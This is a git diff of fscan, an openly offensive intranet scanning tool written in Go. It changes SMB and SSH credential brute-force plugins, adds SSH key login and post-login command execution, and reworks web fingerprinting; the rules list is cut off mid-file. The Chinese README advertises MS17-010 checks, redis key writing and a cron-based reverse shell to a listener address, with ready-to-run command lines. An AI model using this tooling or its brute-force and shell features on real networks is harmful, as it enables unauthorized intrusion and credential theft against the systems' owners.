fmt.Println("start vulscan")
for _, targetIP := range AlivePorts {
info.Host, info.Ports = strings.Split(targetIP, ":")[0], strings.Split(targetIP, ":")[1]
if info.Scantype == "all" {
switch {
case info.Ports == "445":
//AddScan(info.Ports, info, ch, &wg) //smb
AddScan("1000001", info, ch, &wg) //ms17010
AddScan("1000002", info, ch, &wg) //smbghost
case info.Ports == "9000":
AddScan(info.Ports, info, ch, &wg) //fcgiscan
AddScan("1000003", info, ch, &wg) //http
case IsContain(severports, info.Ports):
AddScan(info.Ports, info, ch, &wg) //plugins scan
default:
AddScan("1000003", info, ch, &wg) //webtitle
}
} else {
AddScan("1000003", info, ch, &wg) //webtitle
port, _ := common.PORTList[info.Scantype]
scantype := strconv.Itoa(port)
AddScan(scantype, info, ch, &wg)
}
} else {
port, _ := common.PortlistBack[info.Scantype]
scantype := strconv.Itoa(port)
AddScan(scantype, info, ch, &wg)
}
}
if common.URL != "" {
info.Url = common.URL
AddScan("1000003", info, ch, &wg)
}
if len(common.Urls) > 0 {
for _, url := range common.Urls {
info.Url = url
AddScan("1000003", info, ch, &wg)
}
}
wg.Wait()
common.WaitSave()
common.LogWG.Wait()
close(common.Results)
fmt.Println(fmt.Sprintf("已完成 %v/%v", common.End, common.Num))
}
var Mutex = &sync.Mutex{}
func AddScan(scantype string, info common.HostInfo, ch chan struct{}, wg *sync.WaitGroup) {
wg.Add(1)
go func() {
err, _ := ScanFunc(PluginList, scantype, &info)
if common.LogErr {
tmperr := err[0].Interface()
if tmperr != nil {
tmperr1 := err[0].Interface().(error)
errtext := strings.Replace(tmperr1.Error(), "\n", "", -1)
fmt.Println("[-] ", info.Host+":"+info.Ports, errtext)
}
}
Mutex.Lock()
common.Num += 1
Mutex.Unlock()
ScanFunc(PluginList, scantype, &info)
wg.Done()
Mutex.Lock()
common.End += 1
Mutex.Unlock()
<-ch
}()
ch <- struct{}{}

20
Plugins/smb.go
View File

@@ -9,6 +9,7 @@ import (
)
func SmbScan(info *common.HostInfo) (tmperr error) {
starttime := time.Now().Unix()
for _, user := range common.Userdict["smb"] {
for _, pass := range common.Passwords {
pass = strings.Replace(pass, "{user}", user, -1)
@@ -16,23 +17,30 @@ func SmbScan(info *common.HostInfo) (tmperr error) {
if flag == true && err == nil {
var result string
if info.Domain != "" {
result = fmt.Sprintf("SMB:%v:%v:%v\\%v %v", info.Host, info.Ports, info.Domain, user, pass)
result = fmt.Sprintf("[+] SMB:%v:%v:%v\\%v %v", info.Host, info.Ports, info.Domain, user, pass)
} else {
result = fmt.Sprintf("SMB:%v:%v:%v %v", info.Host, info.Ports, user, pass)
result = fmt.Sprintf("[+] SMB:%v:%v:%v %v", info.Host, info.Ports, user, pass)
}
common.LogSuccess(result)
return err
} else {
errlog := fmt.Sprintf("[-] smb %v %v %v %v %v", info.Host, 445, user, pass, err)
errlog := fmt.Sprintf("[-] smb %v:%v %v %v %v", info.Host, 445, user, pass, err)
errlog = strings.Replace(errlog, "\n", "", -1)
common.LogError(errlog)
tmperr = err
if common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * info.Timeout) {
return err
}
}
}
}
return tmperr
}
func SmblConn(info *common.HostInfo, user string, pass string, Domain string, signal chan struct{}) (flag bool, err error) {
func SmblConn(info *common.HostInfo, user string, pass string, signal chan struct{}) (flag bool, err error) {
flag = false
Host, Username, Password := info.Host, user, pass
options := smb.Options{
@@ -40,7 +48,7 @@ func SmblConn(info *common.HostInfo, user string, pass string, Domain string, si
Port: 445,
User: Username,
Password: Password,
Domain: Domain,
Domain: info.Domain,
Workstation: "",
}
@@ -58,7 +66,7 @@ func SmblConn(info *common.HostInfo, user string, pass string, Domain string, si
func doWithTimeOut(info *common.HostInfo, user string, pass string) (flag bool, err error) {
signal := make(chan struct{})
go func() {
flag, err = SmblConn(info, user, pass, info.Domain, signal)
flag, err = SmblConn(info, user, pass, signal)
}()
select {
case <-signal:

48
Plugins/ssh.go
View File

@@ -1,15 +1,18 @@
package Plugins
import (
"errors"
"fmt"
"github.com/shadow1ng/fscan/common"
"golang.org/x/crypto/ssh"
"io/ioutil"
"net"
"strings"
"time"
)
func SshScan(info *common.HostInfo) (tmperr error) {
starttime := time.Now().Unix()
for _, user := range common.Userdict["ssh"] {
for _, pass := range common.Passwords {
pass = strings.Replace(pass, "{user}", user, -1)
@@ -17,9 +20,18 @@ func SshScan(info *common.HostInfo) (tmperr error) {
if flag == true && err == nil {
return err
} else {
errlog := fmt.Sprintf("[-] ssh", info.Host, common.PORTList["ssh"], user, pass, err)
errlog := fmt.Sprintf("[-] ssh %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
common.LogError(errlog)
tmperr = err
if common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["ssh"])*len(common.Passwords)) * info.Timeout) {
return err
}
}
if info.SshKey != "" {
return err
}
}
}
@@ -28,12 +40,25 @@ func SshScan(info *common.HostInfo) (tmperr error) {
func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
flag = false
Host, Port, Username, Password := info.Host, common.PORTList["ssh"], user, pass
Host, Port, Username, Password := info.Host, info.Ports, user, pass
Auth := []ssh.AuthMethod{}
if info.SshKey != "" {
pemBytes, err := ioutil.ReadFile(info.SshKey)
if err != nil {
return false, errors.New("read key failed" + err.Error())
}
signer, err := ssh.ParsePrivateKey(pemBytes)
if err != nil {
return false, errors.New("parse key failed" + err.Error())
}
Auth = []ssh.AuthMethod{ssh.PublicKeys(signer)}
} else {
Auth = []ssh.AuthMethod{ssh.Password(Password)}
}
config := &ssh.ClientConfig{
User: Username,
Auth: []ssh.AuthMethod{
ssh.Password(Password),
},
User: Username,
Auth: Auth,
Timeout: time.Duration(info.Timeout) * time.Second,
HostKeyCallback: func(hostname string, remote net.Addr, key ssh.PublicKey) error {
return nil
@@ -47,12 +72,19 @@ func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err er
if err == nil {
defer session.Close()
flag = true
var result string
if info.Command != "" {
combo, _ := session.CombinedOutput(info.Command)
result := fmt.Sprintf("SSH:%v:%v:%v %v \n %v", Host, Port, Username, Password, string(combo))
result = fmt.Sprintf("[+] SSH:%v:%v:%v %v \n %v", Host, Port, Username, Password, string(combo))
if info.SshKey != "" {
result = fmt.Sprintf("[+] SSH:%v:%v sshkey correct \n %v", Host, Port, string(combo))
}
common.LogSuccess(result)
} else {
result := fmt.Sprintf("[+] SSH:%v:%v:%v %v", Host, Port, Username, Password)
result = fmt.Sprintf("[+] SSH:%v:%v:%v %v", Host, Port, Username, Password)
if info.SshKey != "" {
result = fmt.Sprintf("[+] SSH:%v:%v sshkey correct", Host, Port)
}
common.LogSuccess(result)
}
}

281
Plugins/webtitle.go
View File

@@ -1,90 +1,265 @@
package Plugins
import (
"crypto/tls"
"bytes"
"compress/gzip"
"fmt"
"github.com/saintfish/chardet"
"github.com/shadow1ng/fscan/WebScan"
"github.com/shadow1ng/fscan/WebScan/lib"
"github.com/shadow1ng/fscan/common"
"golang.org/x/net/html/charset"
"golang.org/x/text/encoding/simplifiedchinese"
"golang.org/x/text/transform"
"io"
"io/ioutil"
"net"
"net/http"
"net/url"
"regexp"
"strings"
"time"
)
func WebTitle(info *common.HostInfo) (err error, result string) {
if info.Ports == "80" {
info.Url = fmt.Sprintf("http://%s", info.Host)
} else if info.Ports == "443" {
info.Url = fmt.Sprintf("https://%s", info.Host)
} else {
info.Url = fmt.Sprintf("http://%s:%s", info.Host, info.Ports)
}
var (
Charsets = []string{"utf-8", "gbk", "gb2312"}
)
err, result = geturl(info)
if common.IsWebCan || err != nil {
return
func WebTitle(info *common.HostInfo) error {
err := GOWebTitle(info)
if err != nil {
errlog := fmt.Sprintf("[-] webtitle %v %v", info.Url, err)
common.LogError(errlog)
}
return err
}
//flag 1 first try
//flag 2 /favicon.ico
//flag 3 302
//flag 4 400 -> https
func GOWebTitle(info *common.HostInfo) error {
var CheckData []WebScan.CheckDatas
if info.Url == "" {
if info.Ports == "80" {
info.Url = fmt.Sprintf("http://%s", info.Host)
} else if info.Ports == "443" {
info.Url = fmt.Sprintf("https://%s", info.Host)
} else {
info.Url = fmt.Sprintf("http://%s:%s", info.Host, info.Ports)
}
} else {
if !strings.Contains(info.Url, "://") {
info.Url = fmt.Sprintf("http://%s", info.Url)
}
}
err, result, CheckData := geturl(info, 1, CheckData)
if err != nil && !strings.Contains(err.Error(), "EOF") {
return err
}
if strings.Contains(result, "://") {
//有跳转
redirecturl, err := url.Parse(result)
if err == nil {
info.Url = redirecturl.String()
err, result, CheckData = geturl(info, 3, CheckData)
if err != nil {
return err
}
}
}
if result == "https" {
err, result = geturl(info)
if err == nil {
WebScan.WebScan(info)
info.Url = strings.Replace(info.Url, "http://", "https://", 1)
err, result, CheckData = geturl(info, 1, CheckData)
if strings.Contains(result, "://") {
//有跳转
redirecturl, err := url.Parse(result)
if err == nil {
info.Url = redirecturl.String()
err, result, CheckData = geturl(info, 3, CheckData)
if err != nil {
return err
}
}
} else {
if err != nil {
return err
}
}
} else {
}
err, _, CheckData = geturl(info, 2, CheckData)
if err != nil {
return err
}
info.Infostr = WebScan.InfoCheck(info.Url, CheckData)
if common.IsWebCan == false {
WebScan.WebScan(info)
}
return err, result
return err
}
func geturl(info *common.HostInfo) (err error, result string) {
url := info.Url
tr := &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
DisableKeepAlives: false,
DialContext: (&net.Dialer{
Timeout: time.Duration(info.WebTimeout) * time.Second,
KeepAlive: time.Duration(info.WebTimeout+3) * time.Second,
}).DialContext,
MaxIdleConns: 1000,
MaxIdleConnsPerHost: 1000,
IdleConnTimeout: time.Duration(info.WebTimeout+3) * time.Second,
TLSHandshakeTimeout: 5 * time.Second,
func geturl(info *common.HostInfo, flag int, CheckData []WebScan.CheckDatas) (error, string, []WebScan.CheckDatas) {
Url := info.Url
if flag == 2 {
URL, err := url.Parse(Url)
if err == nil {
Url = fmt.Sprintf("%s://%s/favicon.ico", URL.Scheme, URL.Host)
} else {
Url += "/favicon.ico"
}
}
var client = &http.Client{Timeout: time.Duration(info.WebTimeout) * time.Second, Transport: tr}
res, err := http.NewRequest("GET", url, nil)
res, err := http.NewRequest("GET", Url, nil)
if err == nil {
res.Header.Add("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
res.Header.Add("Accept", "*/*")
res.Header.Add("Accept-Language", "zh-CN,zh;q=0.9")
res.Header.Add("Accept-Encoding", "gzip, deflate")
res.Header.Add("Connection", "close")
res.Header.Set("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
res.Header.Set("Accept", "*/*")
res.Header.Set("Accept-Language", "zh-CN,zh;q=0.9")
if common.Pocinfo.Cookie != "" {
res.Header.Set("Cookie", "rememberMe=1;"+common.Pocinfo.Cookie)
} else {
res.Header.Set("Cookie", "rememberMe=1")
}
res.Header.Set("Connection", "close")
var client *http.Client
if flag == 1 {
client = lib.ClientNoRedirect
} else {
client = lib.Client
}
resp, err := client.Do(res)
if err == nil {
defer resp.Body.Close()
var title string
body, _ := ioutil.ReadAll(resp.Body)
re := regexp.MustCompile("<title>(.*)</title>")
find := re.FindAllStringSubmatch(string(body), -1)
if len(find) > 0 {
title = find[0][1]
var text []byte
body, err := getRespBody(resp)
if err != nil {
return err, "", CheckData
}
if flag != 2 {
re := regexp.MustCompile("(?ims)<title>(.*)</title>")
find := re.FindSubmatch(body)
if len(find) > 1 {
text = find[1]
GetEncoding := func() string { // 判断Content-Type
r1, err := regexp.Compile(`(?im)charset=\s*?([\w-]+)`)
if err != nil {
return ""
}
headerCharset := r1.FindString(resp.Header.Get("Content-Type"))
if headerCharset != "" {
for _, v := range Charsets { // headers 编码优先,所以放在前面
if strings.Contains(strings.ToLower(headerCharset), v) == true {
return v
}
}
}
r2, err := regexp.Compile(`(?im)<meta.*?charset=['"]?([\w-]+)["']?.*?>`)
if err != nil {
return ""
}
htmlCharset := r2.FindString(string(body))
if htmlCharset != "" {
for _, v := range Charsets {
if strings.Contains(strings.ToLower(htmlCharset), v) == true {
return v
}
}
}
return ""
}
encode := GetEncoding()
_, encode1, _ := charset.DetermineEncoding(body, "")
var encode2 string
detector := chardet.NewTextDetector()
detectorstr, _ := detector.DetectBest(body)
if detectorstr != nil {
encode2 = detectorstr.Charset
}
if encode == "gbk" || encode == "gb2312" || encode1 == "gbk" || strings.Contains(strings.ToLower(encode2), "gb") {
titleGBK, err := Decodegbk(text)
if err == nil {
title = string(titleGBK)
}
} else {
title = string(text)
}
} else {
title = "None"
}
title = strings.Trim(title, "\r\n \t")
title = strings.Replace(title, "\n", "", -1)
title = strings.Replace(title, "\r", "", -1)
title = strings.Replace(title, "&nbsp;", " ", -1)
if len(title) > 100 {
title = title[:100]
}
} else {
title = "None"
if title == "" {
title = "None"
}
length := resp.Header.Get("Content-Length")
if length == "" {
length = fmt.Sprintf("%v", len(text))
}
result := fmt.Sprintf("[*] WebTitle:%-25v code:%-3v len:%-6v title:%v", Url, resp.StatusCode, length, title)
common.LogSuccess(result)
}
CheckData = append(CheckData, WebScan.CheckDatas{body, fmt.Sprintf("%s", resp.Header)})
redirURL, err1 := resp.Location()
if err1 == nil {
return nil, redirURL.String(), CheckData
}
result = fmt.Sprintf("WebTitle:%-25v %-3v %v", url, resp.StatusCode, title)
common.LogSuccess(result)
if resp.StatusCode == 400 && info.Url[:5] != "https" {
info.Url = strings.Replace(info.Url, "http://", "https://", 1)
return err, "https"
return err, "https", CheckData
}
return err, result
return err, "", CheckData
}
return err, ""
return err, "https", CheckData
}
return err, ""
return err, "", CheckData
}
func Decodegbk(s []byte) ([]byte, error) { // GBK解码
I := bytes.NewReader(s)
O := transform.NewReader(I, simplifiedchinese.GBK.NewDecoder())
d, e := ioutil.ReadAll(O)
if e != nil {
return nil, e
}
return d, nil
}
func getRespBody(oResp *http.Response) ([]byte, error) {
var body []byte
if oResp.Header.Get("Content-Encoding") == "gzip" {
gr, err := gzip.NewReader(oResp.Body)
if err != nil {
return nil, err
}
defer gr.Close()
for {
buf := make([]byte, 1024)
n, err := gr.Read(buf)
if err != nil && err != io.EOF {
return nil, err
}
if n == 0 {
break
}
body = append(body, buf...)
}
} else {
raw, err := ioutil.ReadAll(oResp.Body)
if err != nil {
return nil, err
}
defer oResp.Body.Close()
body = raw
}
return body, nil
}

124
README.md
View File

@@ -1,62 +1,78 @@
# fscan
# 简介
一款内网扫描工具,方便一键大保健。
支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写钥、计划任务反弹shell、读取win网卡信息、web漏洞扫描等。
趁着最近有空用go把f-scrack重构了一遍。使用go来编写也有更好的扩展性及兼容性。
还在逐步增加功能,欢迎各位师傅提意见。
一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。
支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。
## 主要功能
1.信息搜集:
* 存活探测(icmp)
* 端口扫描
## why
为什么有LadonGo、x-crack 、tscan、Gscan 这些工具了还要写fscan
2.爆破功能:
* 各类服务爆破(ssh、smb等)
* 数据库密码爆破(mysql、mssql、redis、psql等)
答:
因为用习惯了f-scrack习惯一条命令跑完所有模块省去一个个模块单独调用的时间当然我附加了-m 指定模块的功能。
3.系统信息、漏洞扫描:
* netbios探测、域控识别
* 获取目标网卡信息
* 高危漏洞扫描(ms17010等)
## 最近更新
[+] 2021/2/5 修改icmp发包模式,更适合大规模探测。
修改报错提示,-debug时,如果10秒内没有新的进展,每隔10秒就会打印一下当前进度
[+] 2020/12/12 已加入yaml解析引擎,支持xray的Poc,默认使用所有Poc(已对xray的poc进行了筛选),可以使用-pocname weblogic,只使用某种或某个poc。需要go版本1.16以上,只能自行编译最新版go来进行测试
[+] 2020/12/6 优化icmp模块,新增-domain 参数(用于smb爆破模块,适用于域用户)
[+] 2020/12/03 优化ip段处理模块、icmp、端口扫描模块。新增支持192.168.1.1-192.168.255.255。
[+] 2020/11/17 增加-ping 参数,作用是存活探测模块用ping代替icmp发包。
[+] 2020/11/17 增加WebScan模块,新增shiro简单识别。https访问时,跳过证书认证。将服务模块和web模块的超时分开,增加-wt 参数(WebTimeout)。
[+] 2020/11/16 对icmp模块进行优化,增加-it 参数(IcmpThreads),默认11000,适合扫B段
[+] 2020/11/15 支持ip以文件导入,-hs ip.txt,并对去重做了处理
4.Web探测功能:
* webtitle探测
* web指纹识别(常见cms、oa框架等)
* web漏洞扫描(weblogic、st2等,支持xray的poc)
5.漏洞利用:
* redis写公钥或写计划任务
* ssh命令执行
6.其他功能:
* 文件保存
## usege
简单用法
```
go run main.go -h 192.168.1.1/24
fscan.exe -h 192.168.1.1/24 (默认使用全部模块)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写私钥)
fscan.exe -h 192.168.1.1/16 (B段扫描)
```
其他用法
```
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径)
fscan.exe -h 192.168.1.1/8 (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
fscan.exe -hf ip.txt (以文件导入)
fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)
```
编译命令
```
-h 192.168.1.1/24 (C段)
-h 192.168.1.1/16 (B段)
-h 192.168.1.1/8 (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
-hf ip.txt (以文件导入)
go build -ldflags="-s -w " -trimpath
```
完整参数
```
-Num int
-Num int
poc rate (default 20)
-c string
exec command (ssh)
-cookie string
set poc cookie
-debug
debug mode will print more error info
-domain string
smb domain
-h string
IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
-hf string
host file, -hs ip.txt
-it int
Icmp Threads nums (default 11000)
-m string
Select scan type ,as: -m ssh (default "all")
-no
@@ -68,7 +84,7 @@ fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
-o string
Outputfile (default "result.txt")
-p string
Select a port,for example: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,11211,27017")
Select a port,for example: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9200,11211,270179098,9448,8888,82,8858,1081,8879,21502,9097,8088,8090,8200,91,1080,889,8834,8011,9986,9043,9988,7080,10000,9089,8028,9999,8001,89,8086,8244,9000,2008,8080,7000,8030,8983,8096,8288,18080,8020,8848,808,8099,6868,18088,10004,8443,8042,7008,8161,7001,1082,8095,8087,8880,9096,7074,8044,8048,9087,10008,2020,8003,8069,20000,7688,1010,8092,8484,6648,9100,21501,8009,8360,9060,85,99,8000,9085,9998,8172,8899,9084,9010,9082,10010,7005,12018,87,7004,18004,8098,18098,8002,3505,8018,3000,9094,83,8108,1118,8016,20720,90,8046,9443,8091,7002,8868,8010,18082,8222,7088,8448,18090,3008,12443,9001,9093,7003,8101,14000,7687,8094,9002,8082,9081,8300,9086,8081,8089,8006,443,7007,7777,1888,9090,9095,81,1000,18002,8800,84,9088,7071,7070,8038,9091,8258,9008,9083,16080,88,8085,801,5555,7680,800,8180,9800,10002,18000,18008,98,28018,86,9092,8881,8100,8012,8084,8989,6080,7078,18001,8093,8053,8070,8280,880,92,9099,8181,9981,8060,8004,8083,10001,8097,21000,80,7200,888,7890,3128,8838,8008,8118,9080,2100,7180,9200")
-ping
using ping replace icmp
-pocname string
@@ -84,16 +100,19 @@ fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
-rs string
redis shell to write cron file (as: -rs 192.168.1.1:6666)
-t int
Thread nums (default 200)
Thread nums (default 600)
-time int
Set timeout (default 3)
-u string
url
-uf string
urlfile
-user string
username
-userf string
username file
-wt int
Set web timeout (default 3)
Set web timeout (default 5)
```
## 运行截图
@@ -103,7 +122,7 @@ fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
![](image/4.png)
`fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis 写钥)`
`fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis 写钥)`
![](image/2.png)
`fscan.exe -h 192.168.x.x -c "whoami;id" (ssh 命令)`
@@ -112,16 +131,43 @@ fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
`fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 一键支持xray的poc`
![](image/2020-12-12-13-34-44.png)
## 未来计划
[*] 合理输出当前扫描进度
[*] 增加内网常见高危漏洞
[*] 增加高危web漏洞扫描
[*] 师傅们觉得有必要加的漏洞也可以提issue
`fscan.exe -h 192.168.x.x -p 139 (netbios探测、域控识别,下图的[+]DC代表域控)`
![](image/netbios.png)
`go run .\main.go -h 192.168.x.x/24 -m netbios(-m netbios时,才会显示完整的netbios信息)`
![](image/netbios1.png)
## 参考链接
https://github.com/Adminisme/ServerScan
https://github.com/netxfly/x-crack
https://github.com/hack2fun/Gscan
https://github.com/k8gege/LadonGo
https://github.com/jjf012/gopoc
https://github.com/jjf012/gopoc
# 404StarLink 2.0 - Galaxy
![](https://github.com/knownsec/404StarLink-Project/raw/master/logo.png)
fscan 是 404Team [星链计划2.0](https://github.com/knownsec/404StarLink2.0-Galaxy) 中的一环如果对fscan 有任何疑问又或是想要找小伙伴交流,可以参考星链计划的加群方式。
- [https://github.com/knownsec/404StarLink2.0-Galaxy#community](https://github.com/knownsec/404StarLink2.0-Galaxy#community)
## 最近更新
[+] 2021/6/18 改善一下poc的机制如果识别出指纹会根据指纹信息发送poc如果没有识别到指纹才会把所有poc打一遍
[+] 2021/5/29 加入fcgi协议未授权命令执行扫描,优化poc模块,优化icmp模块,ssh模块加入私钥连接
[+] 2021/5/15 新增win03版本(删减了xray_poc模块),增加-silent 静默扫描模式,添加web指纹,修复netbios模块数组越界,添加一个CheckErrs字典,webtitle 增加gzip解码
[+] 2021/5/6 更新mod库、poc、指纹。修改线程处理机制、netbios探测、域控识别模块、webtitle编码模块等
[+] 2021/4/22 修改webtitle模块,加入gbk解码
[+] 2021/4/21 加入netbios探测、域控识别
[+] 2021/3/4 支持-u url或者-uf url.txt,对url进行批量扫描
[+] 2021/2/25 修改yaml解析模块,支持密码爆破,如tomcat弱口令。yaml中新增sets参数,类型为数组,用于存放密码,具体看tomcat-manager-week.yaml
[+] 2021/2/8 增加指纹识别功能,可识别常见CMS、框架,如致远OA、通达OA等。
[+] 2021/2/5 修改icmp发包模式,更适合大规模探测。
修改报错提示,-debug时,如果10秒内没有新的进展,每隔10秒就会打印一下当前进度
[+] 2020/12/12 已加入yaml解析引擎,支持xray的Poc,默认使用所有Poc(已对xray的poc进行了筛选),可以使用-pocname weblogic,只使用某种或某个poc。需要go版本1.16以上,只能自行编译最新版go来进行测试
[+] 2020/12/6 优化icmp模块,新增-domain 参数(用于smb爆破模块,适用于域用户)
[+] 2020/12/03 优化ip段处理模块、icmp、端口扫描模块。新增支持192.168.1.1-192.168.255.255。
[+] 2020/11/17 增加-ping 参数,作用是存活探测模块用ping代替icmp发包。
[+] 2020/11/17 增加WebScan模块,新增shiro简单识别。https访问时,跳过证书认证。将服务模块和web模块的超时分开,增加-wt 参数(WebTimeout)。
[+] 2020/11/16 对icmp模块进行优化,增加-it 参数(IcmpThreads),默认11000,适合扫B段
[+] 2020/11/15 支持ip以文件导入,-hs ip.txt,并对去重做了处理

70
WebScan/InfoScan.go Normal file
View File

@@ -0,0 +1,70 @@
package WebScan
import (
"crypto/md5"
"fmt"
"github.com/shadow1ng/fscan/WebScan/info"
"github.com/shadow1ng/fscan/common"
"regexp"
)
type CheckDatas struct {
Body []byte
Headers string
}
func InfoCheck(Url string, CheckData []CheckDatas) []string {
var matched bool
var infoname []string
for _, data := range CheckData {
for _, rule := range info.RuleDatas {
if rule.Type == "code" {
matched, _ = regexp.MatchString(rule.Rule, string(data.Body))
} else {
matched, _ = regexp.MatchString(rule.Rule, data.Headers)
}
if matched == true {
infoname = append(infoname, rule.Name)
}
}
flag, name := CalcMd5(data.Body)
if flag == true {
infoname = append(infoname, name)
}
}
infoname = removeDuplicateElement(infoname)
if len(infoname) > 0 {
result := fmt.Sprintf("[+] InfoScan:%-25v %s ", Url, infoname)
common.LogSuccess(result)
return infoname
}
return []string{""}
}
func CalcMd5(Body []byte) (bool, string) {
has := md5.Sum(Body)
md5str := fmt.Sprintf("%x", has)
for _, md5data := range info.Md5Datas {
if md5str == md5data.Md5Str {
return true, md5data.Name
}
}
return false, ""
}
func removeDuplicateElement(languages []string) []string {
result := make([]string, 0, len(languages))
temp := map[string]struct{}{}
for _, item := range languages {
if _, ok := temp[item]; !ok {
temp[item] = struct{}{}
result = append(result, item)
}
}
return result
}

28
WebScan/WebScan.go
View File

@@ -6,7 +6,7 @@ import (
"github.com/shadow1ng/fscan/WebScan/lib"
"github.com/shadow1ng/fscan/common"
"net/http"
"time"
"strings"
)
//go:embed pocs
@@ -14,19 +14,19 @@ var Pocs embed.FS
func WebScan(info *common.HostInfo) {
var pocinfo = common.Pocinfo
pocinfo.Target = info.Url
err := Execute(pocinfo)
if err != nil && common.LogErr {
fmt.Println(info.Url, err)
buf := strings.Split(info.Url,"/")
pocinfo.Target = strings.Join(buf[:3],"/")
for _,infostr := range info.Infostr {
pocinfo.PocName = lib.CheckInfoPoc(infostr)
err := Execute(pocinfo)
if err != nil {
errlog := fmt.Sprintf("[-] webtitle %v %v", info.Url, err)
common.LogError(errlog)
}
}
}
func Execute(PocInfo common.PocInfo) error {
//PocInfo.Proxy = "http://127.0.0.1:8080"
err := lib.InitHttpClient(PocInfo.Num, PocInfo.Proxy, time.Duration(PocInfo.Timeout)*time.Second)
if err != nil {
return err
}
req, err := http.NewRequest("GET", PocInfo.Target, nil)
if err != nil {
return err
@@ -35,12 +35,6 @@ func Execute(PocInfo common.PocInfo) error {
if PocInfo.Cookie != "" {
req.Header.Set("Cookie", PocInfo.Cookie)
}
if PocInfo.PocName != "" {
lib.CheckMultiPoc(req, Pocs, PocInfo.Num, PocInfo.PocName)
} else {
lib.CheckMultiPoc(req, Pocs, PocInfo.Num, "")
}
lib.CheckMultiPoc(req, Pocs, PocInfo.Num, PocInfo.PocName)
return nil
}

176
WebScan/info/rules.go Normal file
View File

@@ -0,0 +1,176 @@
package info
type RuleData struct {
Name string
Type string
Rule string
}
type Md5Data struct {
Name string
Md5Str string
}
type PocData struct {
Name string
Alias string
}
var RuleDatas = []RuleData{
{"Shiro", "headers", "(=deleteMe|rememberMe=)"},
{"Portainer(Docker管理)", "code", "(portainer.updatePassword|portainer.init.admin)"},
{"Gogs简易Git服务", "cookie", "(i_like_gogs)"},
{"Gitea简易Git服务", "cookie", "(i_like_gitea)"},
{"宝塔-BT.cn", "code", "(app.bt.cn/static/app.png|安全入口校验失败)"},
{"Nexus", "code", "(Nexus Repository Manager)"},
{"Nexus", "cookie", "(NX-ANTI-CSRF-TOKEN)"},
{"Harbor", "code", "(<title>Harbor</title>)"},
{"Harbor", "cookie", "(harbor-lang)"},
{"禅道", "code", "(/theme/default/images/main/zt-logo.png)"},
{"禅道", "cookie", "(zentaosid)"},
{"协众OA", "code", "(Powered by 协众OA)"},
{"协众OA", "cookie", "(CNOAOASESSID)"},
{"xxl-job", "code", "(分布式任务调度平台XXL-JOB)"},
{"atmail-WebMail", "cookie", "(atmail6)"},
{"atmail-WebMail", "code", "(Powered by Atmail)"},
{"atmail-WebMail", "code", "(/index.php/mail/auth/processlogin)"},
{"weblogic", "code", "(/console/framework/skins/wlsconsole/images/login_WebLogic_branding.png|Welcome to Weblogic Application Server|<i>Hypertext Transfer Protocol -- HTTP/1.1</i>)"},
{"致远OA", "code", "(/seeyon/USER-DATA/IMAGES/LOGIN/login.gif)"},
{"致远OA", "code", "(/seeyon/common/)"},
{"discuz", "code", "(content=\"Discuz! X\")"},
{"Typecho", "code", "(Typecho</a>)"},
{"金蝶EAS", "code", "(easSessionId)"},
{"phpMyAdmin", "cookie", "(pma_lang|phpMyAdmin)"},
{"phpMyAdmin", "code", "(/themes/pmahomme/img/logo_right.png)"},
{"H3C-AM8000", "code", "(AM8000)"},
{"360企业版", "code", "(360EntWebAdminMD5Secret)"},
{"H3C公司产品", "code", "(service@h3c.com)"},
{"H3C ICG 1000", "code", "(ICG 1000系统管理)"},
{"Citrix-Metaframe", "code", "(window.location=\"/Citrix/MetaFrame)"},
{"H3C ER5100", "code", "(ER5100系统管理)"},
{"阿里云CDN", "code", "(cdn.aliyuncs.com)"},
{"CISCO_EPC3925", "code", "(Docsis_system)"},
{"CISCO ASR", "code", "(CISCO ASR)"},
{"H3C ER3200", "code", "(ER3200系统管理)"},
{"万户ezOFFICE", "headers", "(LocLan)"},
